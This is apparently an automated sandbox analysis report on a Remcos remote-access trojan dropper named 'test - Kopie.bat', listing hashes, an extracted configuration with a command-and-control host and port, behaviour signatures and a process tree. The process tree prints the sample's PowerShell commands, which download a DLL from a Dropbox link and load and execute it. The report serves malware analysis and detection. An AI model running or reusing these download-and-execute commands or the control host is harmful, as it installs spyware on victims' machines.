Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-11-2024 11:26
Static task
static1
Behavioral task
behavioral1
Sample
test - Kopie.bat
Resource
win11-20241007-en
General
-
Target
test - Kopie.bat
-
Size
923B
-
MD5
ba0a26a354f410169ac7f324090c363b
-
SHA1
4af549184125cc12ec7d6d60a45e967fc01b05c2
-
SHA256
6409ef31105b892c7bbc518a0817a5656fa0b37a913b7a25dcfadedc0b55ea91
-
SHA512
ec98404cc9cddbad77ff20235afcf1d71db138e23c6db543d30d498bf2aafe32bf911465cdeeee257df00dc619794d1b7ae811b5bc29bb63c5a94d5a2997bb4e
Malware Config
Extracted
remcos
RemoteHost
23.ip.gl.ply.gg:24321
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
Rmc.exe
-
copy_folder
RootRmc
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
true
-
install_path
%SystemDrive%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-M1WJOM
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid Process 2 2756 powershell.exe 4 2756 powershell.exe -
Processes:
powershell.exepowershell.exepid Process 2756 powershell.exe 4856 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid Process 2756 powershell.exe 2756 powershell.exe 4856 powershell.exe 4856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 2756 powershell.exe Token: SeDebugPrivilege 4856 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid Process procid_target PID 4084 wrote to memory of 2756 4084 cmd.exe 80 PID 4084 wrote to memory of 2756 4084 cmd.exe 80 PID 4084 wrote to memory of 4856 4084 cmd.exe 82 PID 4084 wrote to memory of 4856 4084 cmd.exe 82
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test - Kopie.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/ced931yp7ygkbsx3fibr1/test.dll?rlkey=23mh4gtrl35mfqlt6suof5w8d&dl=1' -OutFile 'test.dll'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -Path 'test.dll'; [TestClass]::Execute()"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD5d405540758f0f5bdaab94f1a054cc67d
SHA107e307420a26d17c2dc1226af6e72018da4ae26c
SHA2562ad4d5239f9647362dc68a96eae37de27bdd40359126715c72d79770d3d75d61
SHA51259496f3ae411c3eda1f20335249fa6635cba06974f07b16a181271708a0d5dd078f50ef349e98e4b53643588eb77f4c56c8e2c7fb51a5c638273009ed1b7b889
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
465KB
MD5c52987ac16d800661b0673db0e88e040
SHA18887a9096dd5baa81fc841fd4066978aabc66d66
SHA25600f66290090abad9e0c8a98e659723a29ad621862a54ff7b67dc326b4cf74ae6
SHA5125431218a44e0a26337b6ad78f4cf225c735a104751a542cb7d882e69ba711b3001d855199c7b91d6113eca2095257daacbb642cf1e84fa1c11e913f5d401782d